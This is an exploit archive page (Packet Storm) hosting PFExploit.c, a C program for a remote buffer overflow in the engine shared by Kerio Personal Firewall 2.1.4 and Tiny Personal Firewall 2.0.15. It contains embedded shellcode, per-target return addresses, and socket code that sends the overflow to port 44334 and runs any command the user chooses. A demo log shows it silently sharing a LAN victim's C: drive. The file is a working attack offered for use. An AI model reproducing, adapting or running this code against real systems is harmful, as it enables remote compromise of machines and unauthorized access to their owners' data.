what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

PFExploit.c

PFExploit.c
Posted May 9, 2003
Authored by ThreaT | Site s0h.cc

Kerio Personal Firewall <= 2.1.4 and Tiny Personal Firewall <= 2.0.15 remote exploit that makes use of a buffer overflow condition discovered in the PFEngine used for both products.

tags | exploit, remote, overflow
SHA-256 | e09529ee95b595d74fd8ddc93ccb3d46340c18332d5c962f794898dac30815bb

PFExploit.c

Change Mirror Download
/**************************************************************
* Personal Firewall Engine remote buffer overflow Exploit
**************************************************************
*
* Original information shared by CORE Security Technologies.
* ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
* https://www.coresecurity.com/common/showdoc.php?idx=314&idxseccion=10
* ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
* Released : 30/04/2003
*
* Coded By ThreaT.
* ThreaT@Ifrance.com
* https://s0h.cc/~threat
*
********************************************************************
*
* This exploit take advantage of the vulnerability discovered by
* CORE Security Technologies for execute a command on remote workstations
* equiped with the fallowing PSW :
*
* - Tiny Personal Firewall 2.0.15
* - Kerio Personal Firewall 2.1.4
*
*********************************************************************
*
* Usage : PFExploit.exe <target> <victim_ip> <command to execute>
*
* =====================================================================
* !! compile with : cl.exe /nologo PFExploit.c /link wsock32.lib !!
* =====================================================================
*/


#include <windows.h>
#include <winsock.h>

#define len 0x1494

void main (int argc, char *argv[])
{
SOCKET sock1;
SOCKADDR_IN sin;
int i;
DWORD byte = htonl(len);

char buffer[len], *p,

shellcode[] =

"\xEB\x69\x6A\x30\x5B\x64\x8B\x03\x8B\x40\x0C\x8B\x48\x0C\x8B\xC1"
"\x8B\x70\x30\x80\x3E\x4B\x75\x4A\x8B\x40\x18\x8B\x58\x3C\x03\xD8"
"\x8B\x5B\x78\x03\xD8\x8B\x73\x1C\x03\xF0\x56\x8B\x73\x24\x03\xF0"
"\x56\x8B\x53\x20\x03\xD0\x8B\x5B\x18\x4B\x8B\x34\x9A\x03\xF0\x03"
"\x74\x24\x10\x8B\x36\x39\x74\x24\x0C\x74\x08\x4B\x23\xDB\x75\xEA"
"\x58\x58\xC3\x5F\x33\xC9\x66\x8B\x0C\x5F\x5F\x8B\x3C\x8F\x8D\x04"
"\x07\xC3\x8B\x18\x39\x08\x8B\xC3\x75\xA6\xC3\xEB\x22\x6A\x01\x68"
"\x69\x6E\x45\x78\xE8\x89\xFF\xFF\xFF\x6A\x01\xFF\x74\x24\x0C\xFF"
"\xD0\x6A\x01\x68\x78\x69\x74\x50\xE8\x75\xFF\xFF\xFF\xFF\xD0\xE8"
"\xD9\xFF\xFF\xFF";

WSADATA wsadata;
WORD wVersionRequested = MAKEWORD (2,0);

struct _target {

char Name[4];
char *RetAddr;
char *App;

} targ[2] = {

{"TPF" , "\xED\xEA\x2F\x01", "Tiny Personal Firewall 2.0.15"},
{"KPF" , "\xF8\xEA\x61\x01", "Kerio Personal Firewall 2.1.4"},
};


printf ("#############################################################\n"
"Personal Firewall Engine, Remote buffer overflow Exploit !\n"
"#############################################################\n"
"Discovered by CORE Security Technologies & Coded by ThreaT\n-\n"
"ThreaT@Ifrance.com\n"
"https://s0h.cc/~threat\n-\n\n");

if (argc < 4)
{
printf ("usage : PFExploit.exe <target> <victim_ip> <command to execute>\n\n"
"TARGET ARE\n"
"__________\n\n"
"TPF : for Tiny Personal Firewall 2.0.15\n"
"KPF : for Kerio Personal Firewall 2.1.4\n\n");

ExitProcess (0);
}

if (!(p = (char *) LocalAlloc (LPTR,(strlen (shellcode)+strlen(argv[3])+3))))
{
printf ("error, cannot allocate memory\n");
ExitProcess (0);
}


memset (buffer,0x90,len);

strcpy (p,shellcode);
lstrcat (p,argv[3]);
memcpy (&buffer[200],p,strlen (p)+1);

for (i=0; i < 2 ; i++)
if (!lstrcmpi (argv[1],targ[i].Name)) break;

if (i > 1)
{
printf ("Erreur : la cible %s est inconnue\n",argv[1]);
ExitProcess (0);
}


if (WSAStartup(wVersionRequested, &wsadata))
{
printf ("Erreur d'initialisation Winsock\n");
ExitProcess (0);
}


sin.sin_family = AF_INET;
sin.sin_addr.s_addr=inet_addr (argv[2]);
sin.sin_port = htons (44334);


memcpy (&buffer[0x1490],targ[i].RetAddr,4);

printf ("Cible : %s\n\n"
"Connecting to %s...", targ[i].App, argv[2]);

sock1 = socket (AF_INET, SOCK_STREAM, 0);
bind (sock1, (SOCKADDR *)&sin, sizeof (sin));
if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) )
{
printf ("connexion failed !\n");
ExitProcess (0);
}

printf ("ok!\n\n"
"sending crash for remote execution of '%s'...",argv[3]);

Sleep (1000);
send (sock1,(const char FAR *)(DWORD)&byte,sizeof (DWORD),0);
send (sock1,buffer,len,0);

puts ("ok");

}

/* DEMO ON MY LAN *

D:\code\exploits\kerio>ipconfig

Configuration IP de Windows 2000

Ethernet carte Connexion au réseau local 2 :

État du media . . . . . . . . . . : Câble Déconnecté

Ethernet carte Connexion au réseau local :

Suffixe DNS spéc. à la connexion. : ThreaT.lan
Adresse IP. . . . . . . . . . . . : 10.0.0.1
Masque de sous-réseau . . . . . . : 255.0.0.0
Passerelle par défaut . . . . . . : 10.0.0.138

D:\code\exploits\kerio>net view \\10.0.0.3
La liste est vide.


D:\code\exploits\kerio>PFExploit TPF 10.0.0.3 "cmd /c net share c=c:\"
#############################################################
Personal Firewall Engine, Remote buffer overflow Exploit !
#############################################################
Discovered by CORE Security Technologies & Coded by ThreaT
-
ThreaT@Ifrance.com
https://s0h.cc/~threat
-

Cible : Tiny Personal Firewall 2.0.15

Connecting to 10.0.0.3...ok!

sending crash for remote execution of 'cmd /c net share c=c:"'...ok

D:\code\exploits\kerio>net view \\10.0.0.3
Ressources partagées de \\10.0.0.3



Nom Type Local Remarque

-------------------------------------------------------------------------------
c Disque
La commande s'est terminée correctement.


D:\code\exploits\kerio>

* EOF */
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close